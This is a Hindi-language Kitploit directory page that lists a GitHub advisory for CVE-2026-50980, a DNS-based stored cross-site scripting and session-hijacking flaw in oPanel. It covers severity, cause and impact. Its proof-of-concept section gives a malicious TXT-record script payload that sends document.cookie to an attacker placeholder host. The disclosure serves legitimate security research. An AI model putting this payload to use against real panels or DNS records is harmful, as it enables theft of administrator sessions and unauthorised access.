Skip to content
KitploitKITPLOIT
उपकरणएक्सप्लॉइटब्लॉग
Log in
जमा करें
उपकरणएक्सप्लॉइटब्लॉग
जमा करें

हैकिंग, पेनटेस्ट और साइबर सुरक्षा उपकरण आपके सुरक्षा शस्त्रागार के लिए!

Kitploit हैकिंग, साइबर सुरक्षा और पेंटेस्टिंग टूल्स की एक निर्देशिका है। कमजोरियों को खोजने, सिस्टम का विश्लेषण करने, परीक्षण को स्वचालित करने और अपनी सुरक्षा को मजबूत करने के लिए नवीनतम प्रोजेक्ट अपडेट खोजें।

··फ़ीड·संपर्क·गोपनीयता·© 2026 Kitploit

टूल निर्देशिका

श्रेणियाँ

सभी श्रेणियाँ देखें
Loading categories
CVE-2026-50980 — oPanel DNS-आधारित क्रॉस-साइट स्क्रिप्टिंग (XSS) और सेशन हाइजैकिंग | Kitploit
उपकरण/GitHubGitHub/bugresearch/cve-2026-50980
भेद्यता विश्लेषणशोषणवेब एप्लिकेशन शोषणवेब सुरक्षाDNS विश्लेषण
GitHubbugresearch/cve-2026-50980

CVE-2026-50980

oPanel DNS-आधारित क्रॉस-साइट स्क्रिप्टिंग (XSS) और सेशन हाइजैकिंग

रिपॉजिटरी देखें
152 महीने पहलेअभी तक समीक्षित नहीं

सबसे लोकप्रिय

सभी देखें →

हमारे समुदाय द्वारा सबसे अधिक उपयोग किए जाने वाले उपकरण खोजें।

सभी उपकरण खोजें

हमारे उपकरणों का संग्रह ब्राउज़ करें

सभी उपकरण देखें →
साझा करें

CVE-2026-50980: oPanel में DNS-आधारित क्रॉस-साइट स्क्रिप्टिंग (XSS) और सत्र अपहरण

अवलोकन

  • CVE ID: CVE-2026-50980
  • उत्पाद: oPanel
  • प्रभावित संस्करण: < v1.20.25
  • भेद्यता प्रकार: DNS के माध्यम से संग्रहीत क्रॉस-साइट स्क्रिप्टिंग (XSS) / सत्र अपहरण
  • गंभीरता: उच्च (CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:H/I:H/A:N)

विवरण

oPanel (v1.20.25 से पहले के संस्करण) में DNS प्रतिक्रियाओं के अनुचित प्रबंधन और सैनिटाइज़ेशन के कारण क्रॉस-साइट स्क्रिप्टिंग (XSS) भेद्यता मौजूद है। जब पैनल किसी हमलावर-नियंत्रित नेमसर्वर के विरुद्ध DNS क्वेरी करता है (जैसे, डोमेन जानकारी प्राप्त करना, DNS प्रसार की जाँच करना, या TXT रिकॉर्ड क्वेरी करना), तो यह लौटाए गए DNS रिकॉर्ड को पर्याप्त HTML एन्कोडिंग के बिना सीधे वेब इंटरफ़ेस में प्रतिबिंबित करता है।

एक हमलावर इसका फायदा उठाकर एक दुष्ट (rogue) DNS सर्वर को TXT रिकॉर्ड क्वेरीज़ का जवाब दुर्भावनापूर्ण JavaScript पेलोड के साथ देने के लिए कॉन्फ़िगर कर सकता है। जब कोई प्रमाणित oPanel उपयोगकर्ता (जैसे व्यवस्थापक) उस पृष्ठ को देखता है जहाँ DNS प्रतिक्रिया प्रदर्शित होती है, तो पेलोड उनके ब्राउज़र सत्र के संदर्भ में निष्पादित हो जाता है।

प्रभाव

सफल शोषण हमलावर को पीड़ित के ब्राउज़र में मनमाना JavaScript निष्पादित करने की अनुमति देता है। जैसा कि प्रूफ ऑफ कॉन्सेप्ट में प्रदर्शित किया गया है, इसका उपयोग संवेदनशील प्रमाणीकरण कुकीज़ (document.cookie) चुराने के लिए किया जा सकता है, जिससे पूर्ण सत्र अपहरण और oPanel वातावरण तक अनधिकृत व्यवस्थापकीय पहुंच प्राप्त होती है।

प्रूफ ऑफ कॉन्सेप्ट (PoC)

शोषण के लिए हमलावर को एक दुर्भावनापूर्ण DNS सर्वर और बाहर निकाले गए डेटा को कैप्चर करने हेतु एक HTTP लिसनर स्थापित करना आवश्यक है।

1. हमलावर बुनियादी ढांचे की स्थापना

हमलावर UDP पोर्ट 53 पर एक दुष्ट DNS सर्वर चलाता है जो किसी भी TXT क्वेरी का जवाब XSS पेलोड के साथ देने के लिए कॉन्फ़िगर किया गया है।

दुर्भावनापूर्ण TXT रिकॉर्ड पेलोड:

<script>new Image().src='http://<ATTACKER_IP>:<HTTP_PORT>/log?cookie='+document.cookie;</script>
टूल डाउनलोड करें